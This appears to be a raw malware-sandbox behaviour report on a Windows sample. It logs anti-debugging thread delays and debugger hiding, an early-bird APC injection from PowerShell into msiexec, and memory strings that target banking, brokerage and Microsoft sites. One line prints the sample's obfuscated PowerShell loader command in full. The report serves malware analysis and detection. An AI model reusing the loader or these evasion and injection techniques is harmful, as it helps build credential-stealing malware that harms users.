Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595847	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7493			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2161			Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm628F.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7884	Thread sleep count: 1425 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7884	Thread sleep count: 8434 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595847s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7880	Thread sleep time: -594484s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00406739 FindFirstFileW,FindClose,	1_2_00406739
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405AED
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Code function: 1_2_00402902 FindFirstFileW,	1_2_00402902

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595847	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: ModuleAnalysisCache.8.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: msiexec.exe, 0000000B.00000002.2540113983.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2540113983.000000000598A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ModuleAnalysisCache.8.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: powershell.exe, 00000008.00000002.1673536791.0000000005B60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ModuleAnalysisCache.8.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000008.00000002.1673536791.0000000005B60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: powershell.exe, 00000008.00000002.1673536791.0000000005B60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: msiexec.exe, 0000000B.00000002.2555779773.00000000225FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	API call chain: ExitProcess graph end node			graph_1-3984
Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	API call chain: ExitProcess graph end node			graph_1-3991

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_05067222 LdrInitializeThunk,

8_2_05067222

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4030000

Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Vrimlenes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\udrring.Pro';$Pilleriet=$Vrimlenes.SubString(52498,3);.$Pilleriet($Vrimlenes)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"			Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

Code function: 1_2_6FDF1096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,

1_2_6FDF1096

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
